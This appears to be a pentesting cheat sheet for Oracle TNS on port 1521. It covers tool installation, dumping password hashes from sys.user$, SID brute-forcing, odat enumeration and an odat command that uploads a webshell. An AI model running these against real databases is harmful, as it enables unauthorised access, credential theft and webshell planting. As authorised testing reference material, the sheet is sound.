Oracle TNS (1521)
Oracle Transparent Network Substrate.
Port
1521 TCP
Oracle TNS
Config File
In $ORACLE_HOME/network/admin/:
tnsnames.ora
: Each database or service has a unique entry in the tnsnames.ora file, containing the information necessary for clients to connect to the service. The entry consists of a name for the service, the network location of the service, and the name of the database or service that clients must use when connecting to the service. In other words, it resolves service names into network addresses, telling clients how to find the databases.listener.ora
: Is a server-side configuration file that defines the properties and parameters of the listening process, which is responsible for receiving incoming client requests and forwarding them to the appropriate Oracle database instance. In other words, it configures the listener, which is the program that sits on the server and listens for connection requests from clients, telling the server how to listen for client requests.
Interact
Installation of the necessary tools
#!/bin/bash
sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome
Documentation HERE.
sqlplus <USERNAME>/<PASSWORD>@<IP>/<SID>
> select table_name from all_tables;
> select * from user_role_privs;
> select name, password from sys.user$;
If you have an error with sqlplus
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib:$ORACLE_HOME
# or
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
Attacks
SID Bruteforcing
Nmap NSE: --script oracle-sid-brute
Enumeration with odat.
./odat.py all -s <IP>
PrivEsc to sysdba
sqlplus <USERNAME>/<PASSWORD>@<IP>/<SID> as sysdba
> select * from user_role_privs;
> select name, password from sys.user$;
Upload webshell to website (if present) with odat.
./odat.py utlfile -s <IP> -d <SID> -U <USER> -P <PASS> --sysdba --putFile <PATH> <NameFileOnServer> ./<myFile>
# ex. <PATH> : C:\\inetpub\\wwwroot
Last updated
Was this helpful?